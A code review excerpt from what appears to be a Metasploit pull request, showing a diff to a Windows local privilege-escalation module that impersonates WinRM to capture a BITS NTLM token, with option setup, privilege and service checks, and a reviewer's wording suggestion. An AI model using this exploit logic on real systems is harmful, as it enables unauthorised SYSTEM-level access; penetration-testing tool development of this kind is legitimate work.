modules/exploits/windows/local/bits_ntlm_token_impersonation.rb

```diff
@@ -4,164 +4,246 @@
+      'As the principle of the exploit is to impersonate a genuine WinRM service,',
+      'it should listen on WinRM port. This is in most case 5985 but in some configuration,',
+      'it may be 47001.'
+    ].join(' ')
 
+    host_process_option_description = [
+      'The process which will be launched as SYSTEM and execute metasploit shellcode.',
+      'This process is launched without graphical interface so it is hidden.'
+    ].join(' ')
 
+    register_options(
+      [
+        OptBool.new('SHUTDOWN_SERVICES', [true, shutdown_service_option_description, false]),
+        OptPort.new('WINRM_RPORT', [true, winrm_port_option_description, 5985]),
+        OptString.new('HOST_PROCESS', [true, host_process_option_description, 'notepad.exe'])
+      ]
+    )
+  end
+
+  #
+  # Function used to perform all mandatory checks in order to assess
+  # if the target is vulnerable before running the exploit.
+  # Basically, this function does the following:
+  #   - Checks if current session has either SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege
+  #   - Checks if BITS and WinRM are running, and attempt to terminate them if the user
+  #     has specified the corresponding option
+  #   - Checks if the session is not already SYSTEM
   def check
-    os = client.sys.config.sysinfo['OS']
-    build = os.match(/Build (\d+)/)
     privs = client.sys.config.getprivs
+
     # Fast fails
-    unless (privs.include?('SeImpersonatePrivilege')) || (privs.include?('SeAssignPrimaryTokenPrivilege'))
-      print_bad("Target session is missing both SeImpersonatePrivilege and SeAssignPrimaryTokenPrivilege.")
+    unless privs.include?('SeImpersonatePrivilege') || privs.include?('SeAssignPrimaryTokenPrivilege')
+      print_bad('Target session is missing both SeImpersonatePrivilege and SeAssignPrimaryTokenPrivilege.')
       return Exploit::CheckCode::Safe
     end
-    vprint_good("Target session has either SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege.")
-    if os =~ /Server/
-      print_bad("Windows servers are not vulnerable.")
-      return Exploit::CheckCode::Safe
+    vprint_good('Target session has either SeImpersonatePrivilege or SeAssignPrimaryTokenPrivilege.')
+
+    running_services_code = check_bits_and_winrm
+    should_services_be_shutdown = datastore['SHUTDOWN_SERVICES']
+    if running_services_code != 0
+      if should_services_be_shutdown
+        shutdown_service(running_services_code)
+        sleep(2)
+        running_services_code = check_bits_and_winrm
+      end
+      if [WINRM, WINRM + BITS].include?(running_services_code)
+        print_bad('WinRM is running. Target is not exploitable.')
+        return Exploit::CheckCode::Safe
+      elsif running_services_code == BITS
+        if should_services_be_shutdown
+          print_warning('Failed to shutdown BITS.')
+        end
+        print_warning('Don\'t panic, the exploit should handle this, but you have to wait for BITS to terminate.')
```

Comment:
I think it would help the operator to understand what's going on if the message explicitly says the `BITS` service is running:
```suggestion
        print_warning('BITS is running. Don\'t panic, the exploit should handle this, but you have to wait for BITS to terminate.')
```

Reply:
Fixed by commit [d1956199aa43267f425999f545b88b992af9ce96](https://github.com/rapid7/metasploit-framework/pull/14046/commits/d1956199aa43267f425999f545b88b992af9ce96)